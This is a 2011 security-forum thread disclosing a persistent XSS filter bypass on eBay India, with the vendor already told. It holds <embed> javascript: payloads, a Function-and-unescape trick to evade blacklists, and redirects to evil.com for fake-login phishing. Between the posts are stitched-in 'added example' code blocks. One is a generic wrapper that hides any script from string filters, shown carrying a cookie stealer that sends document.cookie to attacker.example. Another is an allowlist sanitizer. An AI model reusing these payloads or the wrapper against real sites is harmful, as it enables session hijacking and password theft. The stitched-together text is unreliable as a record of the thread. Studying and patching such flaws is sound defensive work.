
Thread: EBay Persistent Cross Site Scripting (Filter Bypass)

  1. #1 fb1h2s (Security Researcher, India, joined Jul 2010)

    EBay Persistent Cross Site Scripting (Filter Bypass)

    # Exploit Title: EBay Persistent Cross Site Scripting (Filter Bypass)
    # Software Link: http://*.ebay.in [Cookie], http://*.ebaydesc.in [Cookieless]
    # Reported to Vendor: 28/03/11
    # Public Disclosure: 18/08/11
    # At the date of disclosure the vendor was already aware of this flaw.
    # Author: FB1H2S aka Rahul Sasi
    # Version: [All language domains might be vulnerable]
    # Tested on: [.in domains]

    About Application: eBay is an online auction portal where sellers can showcase their products and buyers can bid on the showcased items to purchase them. Sellers can post their content with pictures and a description of the product.

    Vulnerable Module: eBay allows a logged-in user to revise and edit their listed products; the product description also allows HTML, with restrictions on scripts and other unwanted tags. This filter is vulnerable and can be bypassed easily.

    The following is how a new product is edited:
    Code:
    http://cgi5.ebay.in/ws/eBayISAPI.dll?ReviseListing&itemid=+product_id+
    An attempt to add malicious content to the application produces an error page describing the restrictions users have when adding content.
    Filters:



    Restriction 1:
    Using trial and error it was possible to identify that the filters were string filters, so an attempt to put <script> document.cookie </script> would be restricted, as both the string “document.cookie” and “script” tags are blocked.
    Note: filters could be either regular-expression based or string-match based.

    A simple way to bypass this would be to use an object tag and embed JavaScript inside it; as the filter is not looking out for the “<embed” tag, we would be able to bypass the “script” restriction.




    Restriction 2:

    Now we can run JavaScript, but the problem again arises due to the filtering of “document.cookie”.

    This could be bypassed using the following syntax.



    So on the user interface the script would be reflected and would show the cookies.



    Restriction 3:


    But on the listing page the user content is loaded via an IFRAME from a cookieless domain [secure practice], which makes it impossible to target the cookies of the user viewing the listing.

    Code:
    http://vi.ebaydesc.in/ws/eBayISAPI.dll?ViewItemDescV4&item=+evei_item_id+

    Hacking Is a Matter of Time Knowledge and Patience

  2. #2 fb1h2s

    Escaping the IFRAME Protection

    In order to escape from the cookieless domain in the iframe and steal users’ cookies, another trick could be used.

    The following pages allow the script to be called directly without using an IFRAME.



    Here the first URL could execute our queries provided it checks for a particular; if the cookies are present it redirects and calls our injected script via IFRAME, else it would render the page directly.
    First Attack: Password stealing by redirecting to a fake login page:

    Attacker sends victim:
    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItemNext&item=+Evil_script_injected_product+
    All we have to do now is inject the following script, so that on execution the page is redirected to our evil target.



    Restriction 4:
    This script would not be accepted, as the “window.location” and “href” tags are restricted, and the eval() tag is also restricted. This could be bypassed in the following ways.



    A new Function could be used as an alternative to eval() (http://javascript.about.com/library/bleval.htm), and URL-encoding “window.location” bypasses that filter too.

    And now when the victim clicks our link the code executes in the context of ebay.in and they are redirected to our evil target, which could be a fake login page.

    Response




    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItemNext&item=+itemid+
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItem&item=220759770785&si=session_id&print=all
    Code:
    Main Page: <embed src=javascript:window.location="http://www.Evil_fakepage.com"; />
    
    Redirected Page: <embed src=javascript:var tmpFunc = new Function(unescape("%0Awindow.location%3D%22http%3A%2f%2fwww.evil.com%2f%22%3B"));tmpFunc(); />


    Second Attack: Cookie Stealing.

    For cookie stealing to work we need to execute the JavaScript in the context of *.ebay.in instead of *.ebaydesc.in, so the only way for that to work would be to redirect the IFRAME to
    Code:
    http://cgi.ebay.in/ws/eBayISAPI.dll?ViewItem&item=220759770785&si=session_id&print=all
    So here the JavaScript would run in the context of *.ebay.in and cookies could be stolen. The only issue we would have to face would be predicting the &si value of the link, as it is generated based on the cookie “Ebay”.
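Posts #1 and #2 describe a string-blacklist filter that is defeated by switching to an <embed> tag, replacing eval() with the Function constructor and percent-encoding the blocked identifiers. The following is an added example written for this review, not code from the original post or from eBay: it models such a blacklist in Node.js (the blocked list is an assumption reconstructed from the restrictions the post lists), decodes what the post's own redirect payload executes once the browser runs unescape(), and generalises the trick into a wrapper that hides any JavaScript from the matcher. The wrapper encodes every character, because escape() leaves letters and dots visible and a string matcher would still see "window.location". The host attacker.example is made up.

```javascript
// Added example (not code from the original post): a toy model of the
// case-insensitive string-blacklist filter the post describes, plus the
// post's trick of hiding blocked identifiers from it. The blocked list is
// an assumption reconstructed from the post; eBay's real list is unknown.
const BLOCKED_STRINGS = ["<script", "document.cookie", "window.location", "href", "eval("];

// Returns every blacklisted substring found in the submitted description.
// An empty array means the filter would accept the markup.
function blacklistHits(html) {
  const lowered = html.toLowerCase();
  return BLOCKED_STRINGS.filter((needle) => lowered.includes(needle));
}

// Restriction 1: the obvious payload trips two rules at once.
const NAIVE_PAYLOAD = "<script>alert(document.cookie)</script>";

// The post's redirect payload for the ViewItemNext page, copied from post #2.
const POST_REDIRECT_PAYLOAD =
  "<embed src=javascript:var tmpFunc = new Function(unescape(" +
  '"%0Awindow.location%3D%22http%3A%2f%2fwww.evil.com%2f%22%3B"));tmpFunc(); />';

// Pulls the percent-encoded string out of an unescape("...") call and decodes
// it with the same legacy unescape() the browser would use, so we can see
// what actually runs once the <embed> javascript: URL is evaluated.
function decodeEscapedArgument(payload) {
  const m = /unescape\("([^"]*)"\)/.exec(payload);
  return m ? unescape(m[1]) : null;
}

// Encodes every character as %XX. escape() and encodeURIComponent() leave
// letters and dots untouched, which would keep "window.location" visible to
// a string matcher; full encoding leaves nothing for the blacklist to find.
function percentEncodeAll(js) {
  return Array.from(js, (ch) => {
    const code = ch.charCodeAt(0);
    if (code > 0xff) throw new Error("ASCII/Latin-1 payloads only");
    return "%" + code.toString(16).toUpperCase().padStart(2, "0");
  }).join("");
}

// Generalisation of the post's bypass: wrap arbitrary JavaScript in an
// <embed> javascript: URL (the filter has no "<embed" rule, and "<script"
// never appears) and reconstruct it at run time with the Function
// constructor, which stands in for the blocked eval().
function wrapForFilter(js) {
  return `<embed src=javascript:var f=new Function(unescape("${percentEncodeAll(js)}"));f(); />`;
}

// Stand-alone demonstration (attacker.example is a made-up host).
const cookieStealer = 'new Image().src="http://attacker.example/?c="+document.cookie';
console.log("naive payload hits:", blacklistHits(NAIVE_PAYLOAD));
console.log("post payload decodes to:", JSON.stringify(decodeEscapedArgument(POST_REDIRECT_PAYLOAD)));
console.log("wrapped stealer hits:", blacklistHits(wrapForFilter(cookieStealer)));
console.log("wrapped stealer runs:", decodeEscapedArgument(wrapForFilter(cookieStealer)));
```

The point of the model is that the blacklist inspects only the bytes that are stored, while the browser executes whatever those bytes decode to at run time; any filter that cannot follow that decoding step is a blacklist waiting for the next encoding.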

  3. #3 fb1h2s
    PoC Code to Steal Cookies:




    Vulnerability Effects:
    1) User cookies could be retrieved and misused.
    2) Users could be redirected to fake login pages where passwords could be stolen.
    3) There would be the possibility of an XSS worm.
    4) Unwanted transactions could be done in the context of the logged-in user.
    Fixing:
    1) Strong XSS filters should be deployed if HTML is allowed; make sure the XSS filter is updated on a continuous basis, considering the new HTML5 tags.
    2) If no HTML is needed, HTML-encode all the response.write output.
    3) Many more filter-bypassing tags were discovered for the current application and are included along with this report.
    Note: many more filter bypasses could be found.

    Other Filter Bypassing Tags:


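Post #3 recommends either a strong filter where HTML is allowed or HTML-encoding everything where it is not. The following added example, written for this review and not the author's or eBay's code, shows what the first option looks like when built as an allowlist rather than the string blacklist the thread bypasses: elements not on the list (such as <embed>) are dropped outright, only named attributes survive, and URL attributes must resolve to an http(s) address after entity decoding and control-character stripping, so encoded or whitespace-padded javascript: schemes cannot slip past. The tag and attribute lists and the listing markup are assumptions constructed for the demonstration; the htmlEncode function is the "no HTML" fix on its own.

```javascript
// Added example (not the author's or eBay's code): an allowlist sanitizer
// for seller-supplied HTML, the shape of fix post #3 asks for. Tags and
// attributes not named here are dropped; text is HTML-encoded. The tag and
// attribute lists are assumptions about what a product listing needs.
const ALLOWED_TAGS = {
  b: [], i: [], u: [], p: [], br: [], ul: [], li: [],
  img: ["src", "alt"],
  a: ["href"],
};
const URL_ATTRIBUTES = new Set(["src", "href"]);

// For the no-HTML case (fix 2 in the post): encode the five characters that
// let text break out of an HTML text node or attribute value.
function htmlEncode(text) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return text.replace(/[&<>"']/g, (ch) => map[ch]);
}

// Returns a cleaned http(s) URL, or null for anything else. Numeric entities
// and control characters are decoded/stripped first, because
// "java&#x73;cript:" or "java\tscript:" is still javascript: to the browser.
function safeUrl(value) {
  const decoded = value
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)))
    .replace(/[\u0000-\u0020]/g, "");
  return /^https?:\/\/[^\s"'<>]+$/i.test(decoded) ? decoded : null;
}

// Rebuilds one tag from scratch so nothing unlisted survives: no event
// handlers, no style, no javascript:/data: URLs, no unknown elements.
function rebuildTag(raw, name, attrText) {
  const allowedAttrs = ALLOWED_TAGS[name];
  if (!allowedAttrs) return ""; // <embed>, <script>, <object>, <iframe>, ...
  if (raw.startsWith("</")) return `</${name}>`;
  const attrRe = /([a-z][a-z0-9-]*)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;
  let kept = "";
  let m;
  while ((m = attrRe.exec(attrText)) !== null) {
    const key = m[1].toLowerCase();
    let value = m[2] ?? m[3] ?? m[4] ?? "";
    if (!allowedAttrs.includes(key)) continue;
    if (URL_ATTRIBUTES.has(key)) {
      value = safeUrl(value);
      if (value === null) continue;
    }
    kept += ` ${key}="${htmlEncode(value)}"`;
  }
  return `<${name}${kept}>`;
}

// Walks the markup: text between tags is encoded, each tag is rebuilt.
function sanitizeHtml(html) {
  const tagRe = /<\/?([a-z][a-z0-9]*)\b([^>]*)>/gi;
  let out = "";
  let last = 0;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    out += htmlEncode(html.slice(last, m.index));
    out += rebuildTag(m[0], m[1].toLowerCase(), m[2]);
    last = m.index + m[0].length;
  }
  return out + htmlEncode(html.slice(last));
}

// Stand-alone demonstration on constructed listing markup (img.example is
// a made-up host).
const LISTING =
  "<p>Mint <b>condition</b> < 1 owner</p>" +
  '<img src="http://img.example/p.png" onerror="alert(1)">' +
  '<a href="java&#x73;cript:alert(1)">details</a>' +
  "<embed src=javascript:alert(document.cookie) />";
console.log(sanitizeHtml(LISTING));
```

The regex tokenizer is the weak part of this sketch: a `>` inside an attribute value ends the tag early, and the remainder is then encoded as text, which fails safe but mangles the listing. A production deployment should feed the markup through a real HTML parser or a maintained sanitizer such as DOMPurify and apply the same allowlist policy there; the policy, not the parser, is what this example is about.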

  4. #4 Huskygold
    Hi man, but do you have another filter bypass? This doesn't work! Please help me!

  5. #5 D4rk357 (Garage Member, localhost@mumbai, joined Jul 2010)
    Quote Originally Posted by Huskygold
    Hi man, but do you have another filter bypass? This doesn't work! Please help me!
    Hello @HuskyGold. It doesn't work because the vendor has fixed this flaw.
    Spirit was turned 2 ashes ,soul endured so much pain..
    now the darker time evanescence ,the fallen shall rise again.
